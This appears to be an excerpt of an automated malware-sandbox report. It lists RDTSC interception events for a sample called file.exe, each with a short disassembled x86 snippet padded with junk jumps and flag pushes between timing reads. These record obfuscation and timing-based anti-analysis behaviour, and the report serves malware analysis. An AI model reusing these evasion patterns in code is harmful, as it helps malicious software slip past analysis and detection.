Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360122 second address: 53601D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov eax, 69ADF537h 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007F6D19596929h 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F6D1959691Ch 0x00000021 or esi, 36409088h 0x00000027 jmp 00007F6D1959691Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F6D19596928h 0x00000033 jmp 00007F6D19596925h 0x00000038 popfd 0x00000039 popad 0x0000003a push dword ptr [ebp+04h] 0x0000003d pushad 0x0000003e jmp 00007F6D1959691Ch 0x00000043 movzx ecx, dx 0x00000046 popad 0x00000047 push dword ptr [ebp+0Ch] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F6D19596928h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380BBD second address: 5380BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F6D18BC6CBFh 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380BDA second address: 5380BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D19596926h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380BF4 second address: 5380BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380BF8 second address: 5380C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6D19596927h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380C20 second address: 5380C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380C24 second address: 5380C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380C2A second address: 5380C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CC9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380720 second address: 5380763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushfd 0x00000011 jmp 00007F6D19596929h 0x00000016 jmp 00007F6D1959691Bh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380763 second address: 53807BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6D18BC6CC3h 0x00000013 or si, 4BCEh 0x00000018 jmp 00007F6D18BC6CC9h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53804A3 second address: 538053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D1959691Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6D1959691Eh 0x00000011 jmp 00007F6D19596925h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F6D19596920h 0x0000001d sbb eax, 6DB3C7F8h 0x00000023 jmp 00007F6D1959691Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d mov cl, A9h 0x0000002f pushfd 0x00000030 jmp 00007F6D19596921h 0x00000035 sbb cx, 9C96h 0x0000003a jmp 00007F6D19596921h 0x0000003f popfd 0x00000040 popad 0x00000041 pop ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F6D1959691Dh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538053B second address: 5380540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390230 second address: 5390273 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 4Bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6D19596927h 0x0000000c sub ah, FFFFFFAEh 0x0000000f jmp 00007F6D19596929h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390273 second address: 5390279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EC1 second address: 53C0EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EC7 second address: 53C0EE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EE0 second address: 53C0EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EE4 second address: 53C0EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EE8 second address: 53C0EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EEE second address: 53C0F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 movsx edi, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6D18BC6CC9h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F6D18BC6CBEh 0x00000018 mov ebp, esp 0x0000001a jmp 00007F6D18BC6CC0h 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov di, 2930h 0x00000027 mov bx, A85Ch 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A03AC second address: 53A03FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6D19596921h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6D1959691Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov ax, D5FDh 0x0000001c mov bx, si 0x0000001f popad 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A03FD second address: 53A0404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0404 second address: 53A040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A040A second address: 53A041A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov edx, esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A041A second address: 53A0462 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6D19596926h 0x00000008 sbb esi, 5DA63868h 0x0000000e jmp 00007F6D1959691Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dx, si 0x00000019 popad 0x0000001a and dword ptr [eax+04h], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6D19596921h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0462 second address: 53A0472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538062B second address: 53806B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6D19596921h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6D1959691Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F6D1959691Eh 0x0000001e jmp 00007F6D19596925h 0x00000023 popfd 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6D19596929h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0046 second address: 53A004A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A004A second address: 53A0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0050 second address: 53A00B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D18BC6CC8h 0x00000009 and esi, 09242AA8h 0x0000000f jmp 00007F6D18BC6CBBh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007F6D18BC6CC2h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6D18BC6CC7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0244 second address: 53A0248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0248 second address: 53A024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A024E second address: 53A0254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0254 second address: 53A0258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0258 second address: 53A025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A025C second address: 53A026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f push edx 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0645 second address: 53C0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0649 second address: 53C0666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0666 second address: 53C066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C066C second address: 53C0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0670 second address: 53C06A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596923h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6D19596925h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C06A1 second address: 53C06A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C06A7 second address: 53C06AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C06AB second address: 53C06AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C06AF second address: 53C0720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F6D19596924h 0x00000010 add ecx, 66A6CFB8h 0x00000016 jmp 00007F6D1959691Bh 0x0000001b popfd 0x0000001c mov cx, BBEFh 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 call 00007F6D19596920h 0x00000028 mov esi, 4E124C71h 0x0000002d pop ecx 0x0000002e call 00007F6D19596927h 0x00000033 push ecx 0x00000034 pop edi 0x00000035 pop esi 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0720 second address: 53C0724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0724 second address: 53C072A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C072A second address: 53C0770 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov al, C9h 0x0000000d pushfd 0x0000000e jmp 00007F6D18BC6CC1h 0x00000013 jmp 00007F6D18BC6CBBh 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6D18BC6CBBh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0770 second address: 53C0776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0776 second address: 53C077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C077C second address: 53C0780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0780 second address: 53C0791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, EDh 0x0000000e mov edx, eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0791 second address: 53C07C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [76FB65FCh] 0x00000010 jmp 00007F6D1959691Eh 0x00000015 test eax, eax 0x00000017 pushad 0x00000018 mov edx, ecx 0x0000001a call 00007F6D1959691Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C07C0 second address: 53C07F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007F6D8A739E56h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6D18BC6CBDh 0x00000013 and si, 4296h 0x00000018 jmp 00007F6D18BC6CC1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov cx, 225Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C07F8 second address: 53C0812 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ecx, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cl, dh 0x0000000f jmp 00007F6D1959691Ah 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0812 second address: 53C0824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CBEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0824 second address: 53C0844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6D19596923h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0844 second address: 53C084A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C084A second address: 53C084E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C084E second address: 53C0852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0852 second address: 53C08A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6D19596928h 0x00000014 jmp 00007F6D19596925h 0x00000019 popfd 0x0000001a jmp 00007F6D19596920h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370077 second address: 537008C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537008C second address: 53700D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 56DDF742h 0x00000008 pushfd 0x00000009 jmp 00007F6D19596923h 0x0000000e or ah, 0000003Eh 0x00000011 jmp 00007F6D19596929h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6D1959691Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53700D8 second address: 5370114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e movsx edi, si 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 jmp 00007F6D18BC6CC6h 0x0000001a xchg eax, ecx 0x0000001b pushad 0x0000001c mov cx, C29Dh 0x00000020 mov dl, ah 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov dh, 3Bh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370114 second address: 5370119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370119 second address: 5370176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D18BC6CBFh 0x00000009 xor cl, FFFFFFBEh 0x0000000c jmp 00007F6D18BC6CC9h 0x00000011 popfd 0x00000012 push esi 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 pushad 0x00000019 mov di, si 0x0000001c call 00007F6D18BC6CC4h 0x00000021 mov ah, 8Ah 0x00000023 pop edi 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push edx 0x0000002a pop eax 0x0000002b mov bx, 1F56h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370176 second address: 53701F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D1959691Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6D19596921h 0x00000011 sub esi, 706600B6h 0x00000017 jmp 00007F6D19596921h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F6D19596920h 0x00000023 sub cl, FFFFFFD8h 0x00000026 jmp 00007F6D1959691Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f mov ax, 18ABh 0x00000033 mov dx, ax 0x00000036 popad 0x00000037 mov ebx, dword ptr [ebp+10h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F6D19596924h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53701F8 second address: 53701FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53701FC second address: 5370202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370202 second address: 5370246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D18BC6CBCh 0x00000009 add eax, 5E850098h 0x0000000f jmp 00007F6D18BC6CBBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pushad 0x0000001a mov dx, cx 0x0000001d mov al, F9h 0x0000001f popad 0x00000020 mov dword ptr [esp], esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6D18BC6CC2h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370246 second address: 537025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D1959691Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537025D second address: 5370264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370264 second address: 537026A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537026A second address: 53702A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a jmp 00007F6D18BC6CC7h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6D18BC6CC4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53702A3 second address: 53702A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53702A8 second address: 53702C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov di, 3F3Ah 0x0000000f call 00007F6D18BC6CBBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53703F6 second address: 5370406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D1959691Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370406 second address: 537040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
